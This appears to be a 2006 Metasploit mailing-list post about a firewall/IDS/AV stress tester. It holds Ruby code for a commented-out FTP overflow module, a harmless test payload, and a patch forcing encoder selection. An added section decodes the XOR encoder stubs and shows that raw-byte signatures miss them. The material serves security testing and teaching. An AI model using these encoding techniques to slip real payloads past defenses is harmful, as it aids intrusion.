Metasploit mailing list archives
Firewall/IDS/AV Stress Tester
From: vmukhi at vsnl.com (vmukhi at vsnl.com)
Date: Wed, 11 Jan 2006 21:10:51 +0500
I am using the Metasploit Framework to write a Firewall/IDS/Anti-Virus stress-testing product. Too many people I meet are convinced that if they use the above products, their networks are safe from intruders. Thus I wanted a product that will take an exploit and encode it with different encoders to see which signatures are caught by the Firewall/IDS/AV. I read an e-mail on this list that said that even though we were allowed to specify an encoder, the framework finally decided. I made the following changes in the source code to achieve my objective. Am I doing the right thing? The code follows.

vijay20.rb

    require 'msf/core'

    module Msf

    class Exploits::Vijay20 < Msf::Exploit::Remote

      include Exploit::Remote::Ftp

      def initialize()
        info1 = {
          'Targets'       => [ [ 'Windows Universal', { 'Platform' => 'win', 'Ret' => 0x13 } ] ],
          'Payload'       => {
            #'Encoder'  => 'x86/jmp_call_additive',
            #'Encoder'  => 'x86/call4_dword_xor',
            #'Encoder'  => 'x86/fnstenv_mov',
            #'Space'    => 100,
            'BadChars' => "\x90",
          },
          'DefaultTarget' => 0
        }
        super(info1)
      end

      def exploit
        # Dump the payload before and after encoding (bytes printed without zero padding)
        payload.raw.each_byte { |x| printf("%x ", x) }
        printf("\n")
        payload.encoded.each_byte { |x| printf("%x ", x) }
        printf("\n")
        #connect
        #buf = "AAAAAAA" + "\x88\xff\x12\x00"
        #buf = buf + payload.raw
        #send_cmd(["USER", buf], false)
        #disconnect
      end # end exploit

    end # end class

    end # end module

I have written a simple FTP server in C under Windows with a buffer overflow. The exploit vijay20.rb first displays both the raw and encoded payloads; the rest of the code, which connects to the server and serves the exploit, is commented out. The above file is in the modules/exploits folder.
mukhi4.rb

    require 'msf/core'

    module Msf
    module Payloads
    module Singles
    module Windows

    module Mukhi4

      include Msf::Payload::Windows
      include Msf::Payload::Single

      def initialize(info = {})
        super(update_info(info,
          'Name'        => 'Windows Execute Command',
          'Version'     => '$Revision: 1.4 $',
          'Description' => 'Execute an arbitrary command',
          'Author'      => 'vlad902',
          'Platform'    => 'win',
          'Arch'        => ARCH_X86,
          'Payload'     => {
            'Payload' => "\x90\xcc"
          }
        ))
      end

      # Append a trailing NUL so the raw payload is 90 cc 00
      def generate
        return super + "\x00"
      end

    end

    end
    end
    end
    end

Payload mukhi4.rb is a simple copy of an existing payload and returns only 90 and cc. This file is placed in the payloads/singles/windows folder.

manish.rb

    require 'msf/base'

    framework = Msf::Simple::Framework.create

    input  = Rex::Ui::Text::Input::Stdio.new
    output = Rex::Ui::Text::Output::Stdio.new

    driver = Msf::ExploitDriver.new(framework)

    driver.exploit = framework.exploits.create('vijay20')
    driver.payload = framework.payloads.create('windows/mukhi4')

    # First run: ask for the jmp_call_additive encoder
    driver.exploit.datastore.import_options_from_s('Encoder=x86/jmp_call_additive')
    driver.payload.share_datastore(driver.exploit.datastore)

    driver.target_idx = 0

    driver.exploit.init_ui(input, output)
    driver.payload.init_ui(input, output)

    driver.run

    # Second run: same exploit and payload, different encoder
    driver.exploit.datastore.import_options_from_s('Encoder=x86/call4_dword_xor')
    driver.payload.share_datastore(driver.exploit.datastore)

    driver.run

    # Third run
    driver.exploit.datastore.import_options_from_s('Encoder=x86/fnstenv_mov')
    driver.payload.share_datastore(driver.exploit.datastore)

    driver.run

A program that we will run as

    ruby -Ilib manish.rb

Output (each run prints the raw payload and then the encoded payload)

    90 cc 0
    fc bb e7 4b 69 63 eb c 5e 56 31 1e ad 1 c3 85 c0 75 f7 c3 e8 ef ff ff ff 77 87 69 63 77 18 6a 63
    90 cc 0
    33 c9 83 e9 ff e8 ff ff ff ff c0 5e 81 76 e b 66 1 c5 83 ee fc e2 f4 9b aa 1 c5
    90 cc 0
    6a 1 59 d9 ee d9 74 24 f4 5b 81 73 13 2e 5e 2c 6a 83 eb fc e2 f4 be 92 2c 6a

In this program, copied from the samples, we run the same exploit vijay20 and payload mukhi4 with different encoders, and hence the output is different.
To achieve this we made the following changes in the file encoded_payload.rb found in folder lib/msf/core.

encoded_payload.rb

    #our code
    if ( pinst.datastore['Encoder'] )
      preferred = framework.encoders[ pinst.datastore['Encoder'] ]
      encoders.unshift([pinst.datastore['Encoder'], preferred ])
    end
    #their code
    encoders.each { |encname, encmod|
      self.encoder = encmod.new
      self.encoded = nil

We simply copied some code written earlier so that the variables we set place our encoder first in the array, and thus we can decide the encoder used. Is this the right way to write a stress test product?

We have a site wwww.vijaymukhi.com where you see that I have used a zillion products and languages in the past. Of all of them, your Metasploit Framework is not the best but by far the best framework I have ever used in my life. I believe that your product will change the way we write exploits and security tools. I have even learnt Ruby and written over 250 pages on it. You may not realize what a great service you have done people like me who teach OS internals. Some of the tools I plan on writing now could not have been possible without your framework.

An open offer: if any developer from your team comes to Mumbai/Bombay, India, please be my guest. You will be doing me a favour. My way of saying thank you for the great framework that you have built.

Vijay Mukhi
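The three encoded dumps in the message above are the same 90 cc 00 payload wrapped in three different XOR decoder stubs, which is exactly why a byte signature on the raw payload misses all of them. The following is an added example, not code from the message or from the Metasploit Framework: it transcribes the posted hex dumps (zero-padded to two digits), re-implements in plain Ruby the XOR arithmetic that each stub performs at run time (a fixed dword key for call4_dword_xor and fnstenv_mov; a key that accumulates each decoded dword for jmp_call_additive, stopping at the first decoded zero dword), and checks what an exact-match signature would see in the raw versus encoded streams. The key and data offsets are read off the stub bytes in the dump; the minimal encoder, the 0x63694be7 key and the signature helper are illustrative additions.

```ruby
# Added example: decode the three encoder outputs posted in the message and
# compare them against a naive byte signature.  Not Metasploit code.

RAW_PAYLOAD = "\x90\xcc\x00".b   # windows/mukhi4: payload.raw as printed above

# Hex dumps transcribed from the message, in the order manish.rb ran the encoders.
POSTED = {
  'x86/jmp_call_additive' => 'fc bb e7 4b 69 63 eb 0c 5e 56 31 1e ad 01 c3 85 c0 75 f7 c3 e8 ef ff ff ff 77 87 69 63 77 18 6a 63',
  'x86/call4_dword_xor'   => '33 c9 83 e9 ff e8 ff ff ff ff c0 5e 81 76 0e 0b 66 01 c5 83 ee fc e2 f4 9b aa 01 c5',
  'x86/fnstenv_mov'       => '6a 01 59 d9 ee d9 74 24 f4 5b 81 73 13 2e 5e 2c 6a 83 eb fc e2 f4 be 92 2c 6a',
}

# Offsets read off the posted bytes: where the 4-byte key sits (the imm32 of
# "mov ebx, key" or "xor [reg+disp8], key") and where the encoded dwords begin.
STUBS = {
  'x86/jmp_call_additive' => { key_off: 2,  data_off: 25, additive: true  },
  'x86/call4_dword_xor'   => { key_off: 15, data_off: 24, additive: false },
  'x86/fnstenv_mov'       => { key_off: 13, data_off: 22, additive: false },
}

def hex_to_bin(hex)
  hex.split.map { |h| h.to_i(16) }.pack('C*')
end

def le_dwords(bin)
  bin.unpack('V*')   # little-endian 32-bit words, as the x86 stubs read them
end

# Undo a dword-XOR decoder in Ruby instead of executing the stub.
# Plain stubs XOR every dword with one key; the additive stub adds each
# decoded dword into the key (mod 2^32) and stops at a decoded zero dword.
def decode(stub_bytes, key_off:, data_off:, additive:)
  key = stub_bytes[key_off, 4].unpack1('V')
  out = []
  le_dwords(stub_bytes[data_off..-1]).each do |enc|
    plain = enc ^ key
    break if additive && plain == 0
    out << plain
    key = (key + plain) & 0xffffffff if additive
  end
  out.pack('V*')
end

def decode_posted(name)
  decode(hex_to_bin(POSTED.fetch(name)), **STUBS.fetch(name))
end

# The other direction, as a stress tester would drive it: a minimal fixed-key
# dword-XOR encoder that pads to a dword boundary and rejects a key whose
# output would contain a bad character (BadChars is "\x90" in vijay20.rb).
def xor_dword_encode(payload, key, badchars)
  padded = payload + "\x00".b * (-payload.bytesize % 4)
  enc = le_dwords(padded).map { |d| d ^ key }.pack('V*')
  raise ArgumentError, 'bad char in encoded output' if enc.bytes.any? { |b| badchars.bytes.include?(b) }
  enc
end

# What an exact-match byte signature sees.
def signature_hit?(stream, signature)
  !stream.index(signature).nil?
end

if $PROGRAM_NAME == __FILE__
  POSTED.each_key do |name|
    stream = hex_to_bin(POSTED[name])
    puts "#{name}: decodes to #{decode_posted(name).unpack1('H*')}, " \
         "raw-signature hit=#{signature_hit?(stream, RAW_PAYLOAD)}, " \
         "contains 0x90=#{stream.include?("\x90".b)}"
  end
end
```

Every stream decodes to 90 cc 00 00 (the raw payload padded to a dword), none of them contains the raw signature, and none contains the 0x90 bad character, so a detector that only knows the payload bytes has to match on the decoder stub itself or emulate it.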
Current thread:
- Firewall/IDS/AV Stress Tester vmukhi at vsnl.com (Jan 11)
- Firewall/IDS/AV Stress Tester mmiller at hick.org (Jan 11)